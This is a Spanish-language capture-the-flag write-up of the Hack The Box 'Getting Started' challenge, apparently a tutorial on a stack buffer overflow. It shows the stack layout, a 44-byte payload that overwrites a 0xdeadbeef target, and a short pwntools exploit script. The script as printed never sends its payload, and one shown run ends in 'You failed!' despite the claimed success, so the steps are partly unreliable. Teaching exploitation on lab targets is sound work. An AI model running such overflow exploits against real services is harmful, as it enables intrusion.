

Entusiasta del reversing y desarrollo de exploits


Getting Started


Además de un host se nos proporciona un zip que al descomprimirlo nos deja varios archivos, entre ellos una flag falsa, un script en python y un binario compilado

❯ ls
 glibc   flag.txt   gs   wrapper.py  

Al conectarnos con netcat de como esta estructurada la pila e instrucciones

❯ netcat 32451

Stack frame layout 

|      .      | <- Higher addresses
|      .      |
|             | <- 64 bytes
| Return addr |
|             | <- 56 bytes
|     RBP     |
|             | <- 48 bytes
|   target    |
|             | <- 40 bytes
|  alignment  |
|             | <- 32 bytes
|  Buffer[31] |
|      .      |
|      .      |
|             |
|  Buffer[0]  |
|_____________| <- Lower addresses

      [Addr]       |      [Value]       
0x00007ffc3a53fe50 | 0x0000000000000000 <- Start of buffer
0x00007ffc3a53fe58 | 0x0000000000000000
0x00007ffc3a53fe60 | 0x0000000000000000
0x00007ffc3a53fe68 | 0x0000000000000000
0x00007ffc3a53fe70 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffc3a53fe78 | 0x00000000deadbeef <- Target to change
0x00007ffc3a53fe80 | 0x0000563333f7a800 <- Saved rbp
0x00007ffc3a53fe88 | 0x00007fb950c21c87 <- Saved return address
0x00007ffc3a53fe90 | 0x0000002000000000
0x00007ffc3a53fe98 | 0x00007ffc3a53ff68

After we insert 4 "A"s, (the hex representation of A is 0x41), the stack layout like this:

      [Addr]       |      [Value]       
0x00007ffc3a53fe50 | 0x0000000041414141 <- Start of buffer
0x00007ffc3a53fe58 | 0x0000000000000000
0x00007ffc3a53fe60 | 0x0000000000000000
0x00007ffc3a53fe68 | 0x0000000000000000
0x00007ffc3a53fe70 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffc3a53fe78 | 0x00000000deadbeef <- Target to change
0x00007ffc3a53fe80 | 0x0000563333f7a800 <- Saved rbp
0x00007ffc3a53fe88 | 0x00007fb950c21c87 <- Saved return address
0x00007ffc3a53fe90 | 0x0000002000000000
0x00007ffc3a53fe98 | 0x00007ffc3a53ff68

After we insert 4 "B"s, (the hex representation of B is 0x42), the stack layout looks like this:

      [Addr]       |      [Value]       
0x00007ffc3a53fe50 | 0x4242424241414141 <- Start of buffer
0x00007ffc3a53fe58 | 0x0000000000000000
0x00007ffc3a53fe60 | 0x0000000000000000
0x00007ffc3a53fe68 | 0x0000000000000000
0x00007ffc3a53fe70 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffc3a53fe78 | 0x00000000deadbeef <- Target to change
0x00007ffc3a53fe80 | 0x0000563333f7a800 <- Saved rbp
0x00007ffc3a53fe88 | 0x00007fb950c21c87 <- Saved return address
0x00007ffc3a53fe90 | 0x0000002000000000
0x00007ffc3a53fe98 | 0x00007ffc3a53ff68

◉                                                                                                 ◉
◉  Fill the 32-byte buffer, overwrite the alginment address and the "target's" 0xdeadbeef value.  ◉
◉                                                                                                 ◉


Analizemos poco a poco, al inicio se nos muestra como esta conformada la pila y que son necesarios 40 bytes para llegar al inicio del target, este finaliza a los 48 bytes

Stack frame layout 

|      .      | <- Higher addresses  
|      .      |
|             | <- 64 bytes
| Return addr |
|             | <- 56 bytes
|     RBP     |
|             | <- 48 bytes
|   target    |
|             | <- 40 bytes
|  alignment  |
|             | <- 32 bytes
|  Buffer[31] |
|      .      |
|      .      |
|             |
|  Buffer[0]  |
|_____________| <- Lower addresses

Asi que con 48 bytes sobreescribimos el valor completo del target sin embargo nos piden que cambiemos la cadena deadbeef que tiene 4 bytes en lugar de 8 asi que solo necesitamos 44 de esta manera nos quedaria 0x00000000 y los 4 bytes

0x00007ffc3a53fe78 | 0x00000000deadbeef <- Target to change  


Con python podemos crear una cadena con la letra A que se repita 44 veces

❯ python3 -q
>>> "A" * 44

Al enviar la cadena de 44 bytes sobreescribimos deadbeef y nos muestra la flag


      [Addr]       |      [Value]       
0x00007ffe3e564220 | 0x4141414141414141 <- Start of buffer
0x00007ffe3e564228 | 0x4141414141414141
0x00007ffe3e564230 | 0x4141414141414141
0x00007ffe3e564238 | 0x4141414141414141
0x00007ffe3e564240 | 0x4141414141414141 <- Dummy value for alignment  
0x00007ffe3e564248 | 0x0000000041414141 <- Target to change
0x00007ffe3e564250 | 0x000055b11e0a5800 <- Saved rbp
0x00007ffe3e564258 | 0x00007efe8be21c87 <- Saved return address
0x00007ffe3e564260 | 0x0000002000000000
0x00007ffe3e564268 | 0x00007ffe3e564338


[-] You failed!

Podemos automatizar esto en un script que cree una conexión con el argumento host:port que le pasemos, envie los bytes y reciba la linea de la flag

from pwn import log, remote, sys

if len(sys.argv) < 2:
    log.failure(f"Uso: python3 {sys.argv[0]} <host:port>")

host, port = sys.argv[1].split(":")
shell = remote(host, port)

payload = b"A" * 44


flag = shell.recvline_contains(b"HTB").strip().decode()  

log.success(f"Flag: {flag}")

Al ejecutarlo con host:port como argumento envia el payload y recibimos la flag

❯ python3 exploit.py
[+] Opening connection to on port 30284: Done  
[+] Flag: HTB{b0f_tut0r14l5_4r3_g00d}
[*] Closed connection to port 30284